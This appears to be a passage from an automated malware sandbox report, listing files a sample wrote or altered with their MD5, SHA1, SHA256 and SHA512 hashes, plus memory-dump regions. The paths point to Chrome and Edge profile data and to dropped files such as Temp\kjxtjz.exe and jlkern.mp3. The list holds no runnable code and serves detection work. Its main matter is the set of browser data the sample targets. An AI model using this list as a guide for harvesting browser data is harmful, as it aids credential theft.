SHA256 d3841f24b706361bca3afce76c0283694889bab7288106b7f1a6c40c60e7ca3f
SHA512 7ba23ebfb5cf635e56e8c9e4248c9db4e359eacca4857afd7bd60e05d9c9dac503c90777e72ffd9f2129478d7fd8fe2416e21ce8b62dc44af046f4da5e213097

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13363462788961969

MD5 53e62e99281aa2612ce200f466f35b60
SHA1 80f4f412d08c48ffbb085447bb09304f11e55c22
SHA256 d5b5a39505e848d5e755691d35510bbcff85db5a99932ff104a47d7f557130d0
SHA512 200c954a6956c5acb1fa1933953c4cae598c84feeef962bfae9fb818d91291a7837e2df6da71e92b3ddf8644cabca3b734a37ac9f61b13f6f8cc168e1e9698c3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt

MD5 1f7de3ffabbbb0e4fa163a468541058e
SHA1 6b4fbbd40585eec9a67a4be416826c4637dcfa2a
SHA256 decce661a92cb87a844dc0a6e7f2c3fb9e3fab6d0574df3deb848c225a9fc3a6
SHA512 bcf7eb6cb00c1e2b59ed62907f5ae6a27d8a8d0a77320f7542e3cfacf498f9477788e96d92944a563aec06ee1871a48998d179dd62ffe020f8091dc4fe489c0e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1d7a3bc7ce1d1c27f0966248620ce864
SHA1 de1fed162004fcd039c8217c1e279aa2370bc62e
SHA256 6cbde7d8d9a6e4367da0ec03c53b69012c58a051008453822a6980baca3aa538
SHA512 5cb1e85b91ab8fa2b91b71df0eec7bb96a1da3fe591faf5db938cf3e953cfc6a82a9e3d82c1f29aed03f0f3f435afebeb7da5c0279f315ad8ce5258b260b9933

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\63be87ac-3242-4797-873c-2b769e6eb2d5.tmp

MD5 7f99e4f6fd53940a9179c4cecee4c225
SHA1 12ab4bba22f1af563842e87395560facc4326b47
SHA256 2a01ee0166c7eeb5efd9ec05f51f0881ded69a414d87df5a90fa883f3f39e94c
SHA512 a11bf38c98b808085ca3a2349b8152a1e08808fbd83d77fa2f5dc31ddb293d9c9002cde0cff27918bb6e49d346b0ae71b783e9bd57f582785440eb7b931b7d76

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\ce2af83e-cf2c-4b8c-ae1b-8f349dae97bf.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b6a98aa5a4a16a6a65db36bd6e4312d2
SHA1 64bfa5b0fe1f12f207755f9ad5b510b94f7657e6
SHA256 905f0aa5bec6616d909d89bef09327cb70b6ac1af999ee9f2a246045799127b6
SHA512 224b37716dc4b6776ed8910755433bd60e462f36864396bfeed2b9d3a79c4c66897894a5e1581f50834dcb88532a430fcd7042406c3d1344d1047fcc24b5cba1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e3761293d3c6f4fd0c579af3eff9cd33
SHA1 dbf8e7ab96e0bbe05284ab473f62ecf6733323c3
SHA256 64a770a955e87fb908fabb62a762c394c0e88f5d2eb4af195c59ea91fb7f1ff0
SHA512 8b177378cb723221a247824f5d6a5d91d9605b5a0323846b9f9c4a7ebc6b26c917a89c45da7537ff1963be1a595694a00cf67a93929c5dc69d6e4fe23f280454

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9e1b8f1f702f4d1a08008affc42a741f
SHA1 bed87cf752abd500ed2561a5b2c1f6ce4dbb8c7e
SHA256 1f6cbc2a1dbbd82276b29caa4c01b2136b5147e6553e432fdedcc1a8207a05e4
SHA512 5f0df6751974adfc763e181c0c840e3febd8096c4a86f5c9346096b32a7c67b0240a35c14189df2b4020913b2fb9a2f5bc352e0ac271fc333920773e828de590

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 6d3379427c7be7091e58bb8f6f4c8ea8
SHA1 de839c225f7245383f19ce3ac5a56c55153cab09
SHA256 cc4d8d944cf3c8b1403b83ecca0def15fd8a1a86eeaf988990d70e924b84d33f
SHA512 6feace58c6d50ffd1c24cfdc1b045c36da30c8fffd2cd5fe0d1d70c764a31da4801897e8bfc11b3342b3a329eec6e5670960fc59669b2e5872437aa55e6010ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9eec6bd7e82fb2f6cfe6920226be72ce
SHA1 1bf1de996c2b1f010812f8778a6d37b35a171abb
SHA256 3a08b0484df4c5690d35a18554b40bad660c4a08d2ea18b324125f0ba8bf08c3
SHA512 9e17509684b5be015d203debf6cad99708c09fc3fcc4e6becdc4989e8499003f77fb40097884df6a6902fad724bc6a080f1c709013553a7c18bbb7eef7d64d19

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e2f72e0363ebe9a29f2cfe5b029866b5
SHA1 648467b507c50274a62a6fb4e6a117dd7d8d0c55
SHA256 b26ef2ff5ce37963cf4a67e8548679293adb2bbdafa0f1583c89c4c9bac9706a
SHA512 5e0d9f7c23bcbe6c39123f1c26ba5fb80c27b5c523cbcac879907686955f0bdebf66b8e90bafec225ba3539928c921d84e4b43d3d5923e2bba5c05f1a68c79a8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\Origins\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 df14916c6e64d9dc2274cbb65b5b15db
SHA1 1c16ef53e20be90af3c9b4f4cc7fd291695fe38d
SHA256 7a3202c45e4e6daf5abfcd695223e39ab9d08d8ec77b2cc89299ca73372a6084
SHA512 8c78682c65ca8e2908b8be8165d60e67219a0b3fb07ebc9f23b1772623416e3414b4d8d316b2a123134dfe9dee395168de7be6fc59587cb95d00226a68f0c3ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7f9841ae9cd6952b607fb46e3416eece
SHA1 b066e7283c2f16fe44d35e17c40b4903b543138f
SHA256 e244c8274d9b425cb4f4eaa2ce80c35914bf13c8a76ca962786596ce1d5aabd3
SHA512 9aab5996bc9f39ee9cea726d916d5affa9c212e951b5a71ceafdbe3818158cd5d1743bba4eb642373da6f33dc3e01c9c2df987e11cd77ca505c11cfedd75cc15

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a1738bd598efc8b992258de975c1d5bc
SHA1 e668594e646e95c3c7315954b8feb2fa569f59d4
SHA256 2fe4b24447a8e6e7501bb7cb37a62445efa070fa40bacb642ac532f701950ebc
SHA512 686ebfae717690380c02ce5d99d71e82a6a527da8b26bf05d8d941dc386536d9a75e226093a1341456036c2fb1e5bf249480c786d3be2b38a42d5cc9bae7fa61

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 8accdd5e7f3ac35c1a20a0c02a458046
SHA1 cfd0ac75adab5ef5d907e336daaf02cb23a7e74a
SHA256 b54343f1224d79bd1a49cff396a466a36809e3ac46e936357c5afb0f6033abc5
SHA512 5db53d6184671b9decf151aec8e9f74cd1bb2fa612876b293e6802d4b1cb3ca015893044e84575da805134c23e7ec2def9737233f25c71901581f0321081f768

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a93a9d5b05f8ff46a24231dfc601517c
SHA1 58c3bbc26fbab6a70f1b2fe03efe72552bfc131b
SHA256 4c9fa0384131409239cd64715b1304e62beff762fbface46d731b9cd4c208135
SHA512 af27bb30bdedd640d650f1d00cb54937bee3aead8fbc2165e4ef7c14f2a3ec18ac90f8dfe17d1bfae1b93d2b9e9e3b8607d8761192982b19a25a57a33656cc11

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 e177e41165f82f394afb8165fc99c186
SHA1 5195aa2c343cc03c5963f8b9cef465c82ab78faf
SHA256 baf02fd04e00c0360a2ba123a4dfe088e021c2f0bbe2c34a382f921873784c30
SHA512 ed6afdd695e093b3694446f6fc5a55f126986fe76d3c38780237752209ff2a77e59dad4ded6d6976782dfe1e6de241411266a219057e2b2031454dc3ac06b4f1

memory/1424-891-0x000000001B930000-0x000000001B93A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fe3a4edb2a83ce9664496a176ff12f03
SHA1 e8e283a2fa3ec42fe8dcda82a91fb66a51ab7709
SHA256 f5a2dbc4661ad07bf6b12a85ef275772b0ba05d1b4e9289d791ab6898c214c93
SHA512 2caeb21711178b39b2fd530cae7e34cf1d82ad815f20dbc36ab71c3ae33bea377f865e51589796446682bbd55f290acbe3d005803b90f8c29bda8a91260b4a74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 95d6781b58ea1d3f71d3e4942e013813
SHA1 cfcb523db468d2c6fc94283b2486adae2bb39344
SHA256 a4ed7a1fc98ff342927e14cec2ed7974c8e38f2d5a42a18c9e4a930277ca1739
SHA512 5c2834d2618d022a46dfd9c266a01c652d2dfe39476004c11af37f310fdf3909e655baf57a9d3c538fa2439b81b35a1b0a997efd8c719d7cc6af820502973d73

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 4da2e86e1716ee74bfe4dc00e0d0f879
SHA1 9f77aea17336cc00265c93e5c7de0d4abb1079ed
SHA256 ef22d66ce34b35441ee9b9c5ca534484b101fa9cd27f9a13c9a8a72d80830287
SHA512 ea5d8a0eaa77bc538d72f93450b0535c5cd2177fd30e9c916f8ee2bdf2fba1f3bc041f91773fb784cd8b405fdd86d62fe489d8040ed5a0b7ccffe74ae925bd58

C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe

MD5 e6a20535b636d6402164a8e2d871ef6d
SHA1 981cb1fd9361ca58f8985104e00132d1836a8736
SHA256 b461c985b53de4f6921d83925b3c2a62de3bbc5b8f9c02eecd27926f0197fae2
SHA512 35856a0268ed9d17b1570d5392833ed168c8515d73fac9f150cf63cc1aea61c096aa2e6b3c8e091a1058ba062f9333f6767e323a37dfb6f4fa7e508a2a138a30

memory/2440-989-0x0000000000350000-0x0000000000370000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 212d38a6505829e12bcbc3f4be888bdd
SHA1 d4b226ef1d24ba34546104f645cf5f2606af7039
SHA256 f495199e905c384a73142bd98da44a756aeb30cec6e9a1c8d04ca49c1bbb02a8
SHA512 942a1d2331e9db49ee14f7d28447bdfa175e71eacc6cb8db5cb40914323066b0146af3a755b06164728dac87b1e9a465741bd272e59ac38ff90a477df42a66c8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6004874a9adb2242c513a11d7a0a9eb2
SHA1 bef77b210edbc9ccfa78166ec93aab9a35f415b7
SHA256 7c5b4d7b1597cc20f96bb7d46f0bb86757bb57946eb8dc0d3ad4299f6963a165
SHA512 f21c7d43fe0ddf3f9b8c66a9b79bf679350e21cf7f66518a3f48253f29d9b16bb358518a11a843ee69a88fb295a8939d5ff22e3112ae20d2400db8bbc2e864e5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7f08ca2aca089a126339335888aa3c2d
SHA1 405f2c64e1c676723d56059e08ee13a450550124
SHA256 c89c57b3a1d6818491fd2b7399d73f0fbd6bfaa6b957c53e34593f95e2357693
SHA512 30b91112dc6885a2e3efee1b41967b54890ebf272adea29d5391d016710ea99e334e58f0cb8648abe7b5a5d5eb288b68c7cf4a853d01878473eb27786abe8cfb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6c53fb4047f362f3cbf75e7535e883d9
SHA1 955fc03ff3231a9f2a36b154fd4f9f3e528f0624
SHA256 f843f32e8ac0beb62be1d750b31bea14a8b66935b7e364839d78941816cc9c61
SHA512 ade87422e537e467349cdfa18e50fe79844adbecce05fb8df50a8ae26f08441b4447f22088f3dd3354a4d121ad9967a0b250eecbbd3761a8ec7ad7e77cc8c3a3

memory/2340-1510-0x0000000000B20000-0x0000000000B40000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 765434d8a267b2c0df3bf2fa95dac82c
SHA1 52500a11191e1d185c1c891dedbfcd9fc56f9793
SHA256 4da58de160f7a7d53697601c82b6a3ebe82f1a6a8345831cfbd25961dd4b04ed
SHA512 7b9e0e5fe1abbfe36032412462cc7b7aff3c7d63ef8e6f272880a5bb12e6dd7652c2238309b305ae386b79e887ba91f86c6a21ffd8fe3de170542e81719bafaa

C:\Users\Admin\AppData\Local\Temp\jlkern.mp3

MD5 42b45fb12d0bad795c5c7a925b15c264
SHA1 1486f01f9b95cd6577466b8e26f957262a9185ce
SHA256 93fca11d81839895b00c590d9a03a094c62495ccd36a7e42e0d33af9437bd418
SHA512 d282cc116881ef74e96340eac116cf14823dc0702c6d62b9c7e62da60c4ecb792494d48e69c6f2f46150e7dc8cadd2d316fa5267b7e38b28ec2db73fc2287d3f

memory/912-1532-0x00007FFD201D0000-0x00007FFD20204000-memory.dmp

memory/912-1531-0x00007FF7C34E0000-0x00007FF7C35D8000-memory.dmp

memory/912-1540-0x00007FFD1BB80000-0x00007FFD1BB91000-memory.dmp

memory/912-1533-0x00007FFD06E50000-0x00007FFD07106000-memory.dmp

memory/912-1539-0x00007FFD1BBA0000-0x00007FFD1BBBD000-memory.dmp

memory/912-1541-0x00007FFD016E0000-0x00007FFD018EB000-memory.dmp

memory/912-1538-0x00007FFD1BBC0000-0x00007FFD1BBD1000-memory.dmp

memory/912-1537-0x00007FFD1BE30000-0x00007FFD1BE47000-memory.dmp

memory/912-1536-0x00007FFD20790000-0x00007FFD207A1000-memory.dmp

memory/912-1535-0x00007FFD21160000-0x00007FFD21177000-memory.dmp

memory/912-1534-0x00007FFD23260000-0x00007FFD23278000-memory.dmp

memory/912-1548-0x00007FFD1B460000-0x00007FFD1B471000-memory.dmp

memory/912-1547-0x00007FFD1B620000-0x00007FFD1B631000-memory.dmp

memory/912-1546-0x00007FFD1B640000-0x00007FFD1B651000-memory.dmp

memory/912-1545-0x00007FFD1BB10000-0x00007FFD1BB28000-memory.dmp

memory/912-1544-0x00007FFD1B660000-0x00007FFD1B681000-memory.dmp

memory/912-1543-0x00007FFD1BB30000-0x00007FFD1BB71000-memory.dmp

memory/912-1542-0x00007FFCFD7F0000-0x00007FFCFE8A0000-memory.dmp

memory/912-1560-0x00007FFCFD7F0000-0x00007FFCFE8A0000-memory.dmp

memory/912-1587-0x00007FFCFD7F0000-0x00007FFCFE8A0000-memory.dmp

memory/912-1598-0x00007FFD06E50000-0x00007FFD07106000-memory.dmp

memory/1424-1650-0x000000001B970000-0x000000001B986000-memory.dmp

memory/1120-1652-0x0000000000400000-0x0000000000410000-memory.dmp

memory/1120-1653-0x0000000005760000-0x00000000057F2000-memory.dmp

memory/1120-1654-0x0000000005800000-0x000000000589C000-memory.dmp

memory/1120-1655-0x0000000005E50000-0x00000000063F4000-memory.dmp

memory/1120-1656-0x0000000005A80000-0x0000000005AE6000-memory.dmp

memory/3288-1657-0x0000000002660000-0x0000000002696000-memory.dmp

memory/3288-1658-0x0000000004E80000-0x00000000054A8000-memory.dmp

memory/3288-1659-0x0000000004C70000-0x0000000004C92000-memory.dmp

memory/3288-1660-0x0000000004E10000-0x0000000004E76000-memory.dmp

memory/3288-1670-0x0000000005830000-0x0000000005B84000-memory.dmp

memory/3288-1671-0x0000000005C10000-0x0000000005C2E000-memory.dmp

memory/3288-1672-0x0000000005C50000-0x0000000005C9C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000b

MD5 15b07d0834be5ce9e1fa1265079859a1
SHA1 9aae71abb06cd4554a594f88b09f52f6629ffdc8
SHA256 870ca3db53a1372427fe59c45385d6ab7916ce1cfe21ddd48bc6631e45318f73
SHA512 36d2fddbcc3c5322ed37e5c8c8292b9a52c96ac2c301776b5dad08eb8e4c80f5f565c850cb5cb70498565903c3828c0ff1f4620f33540fe645e58ce258579449

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000a

MD5 921df38cecd4019512bbc90523bd5df5
SHA1 5bf380ffb3a385b734b70486afcfc493462eceec
SHA256 83289571497cbf2f2859d8308982493a9c92baa23bebfb41ceed584e3a6f8f3f
SHA512 35fa5f8559570af719f8a56854d6184daa7ef218d38c257e1ad71209272d37355e9ad93aaa9fbe7e3b0a9b8b46dfc9085879b01ce7bb86dd9308d4a6f35f09e5

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000c

MD5 4392f4aa5f9d368e8d3ae01f401f1fe4
SHA1 f50229132f14636538cd0af8da2e282bf3899c07
SHA256 401775c120db5f1ba733a35e9dd144011a3d438745b1fdf42166b1c192615726
SHA512 b276167a919f54478ed7e34d573a7c521defe05227ca03a200b28c2ce8ff482c817db99a7e1e223fea2cb0198834b180d60d95f8ff3613f248bff9496683dad7

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_00000d

MD5 b1eb0510e50c43ab382dff6bc16feb9c
SHA1 0946694beca14543debb3e042367878ce9ccd8a1
SHA256 d3020cc01a18c8c319adf24447941be4dc74b960f216cf52259c5de625a6c4f8
SHA512 61a66814cd333882945be162dfa18d06c4fc1462bf774f92bea7eb5f61101b3c8b0ecd92122d03bd41f490566fef04c22a156ea42685fe289cbdfeedbbea3523

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Extension Rules\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\GrShaderCache\f_000011

MD5 8dd9830d961c5bae9214df480c877196
SHA1 b8603c33c8351eac49304a27bacacb6673c24708
SHA256 09d547b64673c1caec5c9fb12251ed106f14d1da24591cf1b684ecbae45950f7
SHA512 1d6916d02e9a478aaa2ef16ff20b176e89c7b5d7c7944111b8e38f9f86482b18a1966305baa72b225a094a003164a0b5eb59d606c9e9d0409c3a4407dd3fbd46

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\ShaderCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\ShaderCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad\settings.dat

MD5 a85e5add31f209ed527bf82ac0768582
SHA1 9551a7f1878b70b64d4ed23aa8f5d69cc6f272b9
SHA256 9b28265c7c93e93355a28432984cef0ab471397329c2924745ff139d2a585c43
SHA512 4e216dc0fb62569a58c05a34e91658cf481db11e2d27589f1cc556ed2e986bf6d999a51dd35a6cc98c59be97f9f64df3ff084bdd8b8f1739f4589e7c47e11bbc

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

MD5 c50e50d18319b9203c40e63fbc5df794
SHA1 9b1dcb29c13d19756035903e9d005b42150a10d0
SHA256 13c092c4768bfd142b7b3d1f8cc3c61692d1e14a82de42d73c9d547711f9baac
SHA512 2c21d057cc080e86ca4dc36e9f483f11c1539f9fa4a612792ec6193a592500d2f9338d221af915a2163808de6e48416e42ed224d1c777e9e4e3a7b89e9e8ae9e

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

MD5 6bbf45f9be439d26cfe7f90a7a0ff0cb
SHA1 fb33d96eefede32c96163d54a26bb9f85a12c630
SHA256 03d195b35c843e37485485bb826bb2a2e9188eaacecebecef96f2da33970934b
SHA512 25a0e64109f1d861ad77ccdbfb462b70ba767368fd5495562562dc8eda09b2a101535dae135f0a2e36727c6852da1c959954703bc71b1220dc50fe8e75887cd2

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

MD5 6fb41491f96071cac5a5666a39e5d1bc
SHA1 247c7042b71230561dde663d9c89441f6fc8ac98
SHA256 08596e7bce83adfb1453d45f69298e721cf1a449ec8b15f45926b9ecb3e0a35b
SHA512 a330f3705bee70999c7d4c2af08c8140ef1d9887d9210ba9a8c5a1243c5bcc53f8d2d1c795aaf06e40a4cc1dfa8fcea9c466dfdc67ad47c6765edb8693431eb4

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Module Info Cache

MD5 031cd80b6fb12008ae14f9d1215175bd
SHA1 bba6d2619a36c1624e36cabb26d71e01b10b7212
SHA256 a7d1cfb8cab4fde128e5dfdc143a18f04941bdfb4ad645dbbdd745584ca61045
SHA512 b4a9027aa6809227cd69641ec3dad2f5409a91def6b1268ed55fba89f3214cc5bfd0f0db53be1973d500593564bd113c4562f8488c17b73d15f480aed4a6b70f

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Cache\Cache_Data\f_000038

MD5 9901c48297a339c554e405b4fefe7407
SHA1 5182e80bd6d4bb6bb1b7f0752849fe09e4aa330e
SHA256 9a5974509d9692162d491cf45136f072c54ddc650b201336818c76a9f257d4d2
SHA512 b68ef68c4dcc31716ce25d486617f6ef929ddbb8f7030dd4838320e2803dd6dd1c83966b3484d2986b19f3bd866484c5a432f4f6533bb3e72f5c7457a9bb9742

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

MD5 7e4a6e9b58c0349ab864e90942893231
SHA1 8054c056576c27217203bbdfa2df85ec96c45bb0
SHA256 2d5af428f49734881e78dda528f42077a84a5026de8437f27e88e4e9407286cd
SHA512 0153d45712af81cd96025efa7d32d4ff620105c269d23d8833d00d2bfd5921bd6b6f4c88b4fecca9aa1362c9677dd79235d32b28d5ec655ee996c408f24aa13d

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Module Info Cache

MD5 27a06a676b4109e63c58449f720dc12f
SHA1 270bde380f992c8285df00c70c26819a83e8a20e
SHA256 932b699dffd926f5c1b1cf8ecb4e9535bf6983464eace7f7893234ff38540066
SHA512 402ba2a4f6f3535325a5c5274159db1a0e998c19404e4e9515322c53887b8b94e15a54ed4cf93b1971c5974d2bb86d90906f0ae98a72d634c2605e3110775dd7

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index

MD5 bed046c68bf0d2fae079d81abae3b19e
SHA1 d0e317fe64c0db17783b569b2a8cc02977191280
SHA256 53f46159e4a9864c9ebbed7a6f6e8c7a80a663414a9a759d5fb3b196608e8878
SHA512 7729b9ad0216f4e2e7de1e19bd2ea52705ccc874f1fa9df05ebbd3c6cdd41140d68e372e89bc4513a9c0ea80b3912c765b6166a2adbe72ccb5d2b503fc7353c7

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index~RFe5df196.TMP

MD5 fc9ebd35b43859a008c5837dd8fcaecb
SHA1 0e9a5374c9af2918150a6f45778a88e16573eadb
SHA256 f197979e1b5724efaff2408f8f8811e994f34df990cc9b3915ebd6e087ac3020
SHA512 0722a18b0448923de013ab374d1f741a0251283f1e1afe9717842bd2f46a95d34ceb5024cc9bc23d14662429dbfac556d0d2dd93c4e46df09e16ed3ea7448cf8

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Preferences

MD5 066b349856e748ca273161e5907115b2
SHA1 7aca99343515fe87728c18ee892e8a249e43a4d7
SHA256 84be7030151f294cf72e6aa5a7acb50c543990c7cdb1600646a4b3fd83f0c07f
SHA512 89e953c9c1a4b2f28367882cd75a9c7e7317d9983c0315779e748b6da538c5876ed57dfb83e2adef8d6740d0b316ae2aaf23626320bebefbe28dfcac92cd2b0e

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

MD5 842cfac8be791eaa12d915e6f925b41b
SHA1 4c62b343e9bb5210c8be000099023df0e3532a54
SHA256 57c758ca73d073f7c10e304437240d0d575ba29a654fa58a4f5481fb2c010e34
SHA512 816a9af1e2d22f0906a09518add1865d16620b690d1de7a80e628c7bb3ccf6078cd47733cf72c52065df5e7a4a3db77670463d30a2bbeb97ffb23a4f67ce460b

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Module Info Cache

MD5 66c23b3050b8a34e914b9c153a99c87a
SHA1 2b6bc355b719e7e7741ebe6329f58a2d5c36b34a
SHA256 5b3d6c8609bee116bf7ca763c1cb94167ea65b35c09c1bd676a081b658c0e400
SHA512 20a34647787143fa9a223a5e35bacfcebeb8292397e439de0d5350df82a02d569624f71a01d1727d4f471de1ea432526b6ca553bccbd96b71686fba9a5ca4b32

memory/1424-2470-0x000000001D370000-0x000000001D52A000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\Network Persistent State

MD5 d47a0ca391f0552b69707d3d71fa5ad3
SHA1 7070316b3799a5e3f628d8685d40a71c07f404d8
SHA256 5cc2010cfc227f851112516be88dff6ab406067f212ba36ccc8a5f5dc9e8cfea
SHA512 1b60cedb7cdecd02db05a4593ced6a4cfadfc00bc49db13bad8f53961826d298044253264dbbb1c8f2edd654610b9f02e2457b236b45881bcf4a307140a96ce6

memory/1424-2590-0x000000001B990000-0x000000001B99E000-memory.dmp

memory/1424-2627-0x000000001B9A0000-0x000000001B9B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 3b24a24e45d693e5bf532118a886c365
SHA1 317a3a3f4dbfe75704b8be152b0f935caf3bda1e
SHA256 f5a9ea371eeefeda061fba15a3fbc8ebaeaf11485fc3795b100c9392baf84a3e
SHA512 dd2919e941e2869d11cd9b53cf08548c251fcd0c1dcc5ea648dac197ff4305fc75868be24af7ff4b62295d3b80bf38a8fed356d021fad50a972103ae638ed140

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 d90adf24b5bc9a74032c97b1cd2e26d5
SHA1 91b33ebb2609d461531087d53672ab3da6dbb793
SHA256 307cd011ae0dac42df673aa002ae6d516f475744be468b2eb7d4e91d788abb23
SHA512 bd06f7eb04170dc9f4c0bdd1c5ef6a32f1b30e9f879412d1486cf74028b1b1f6dc019122b6b1234ff3946695fb2cb82ac53a5c6f2c17dbb516a75437fb20b967

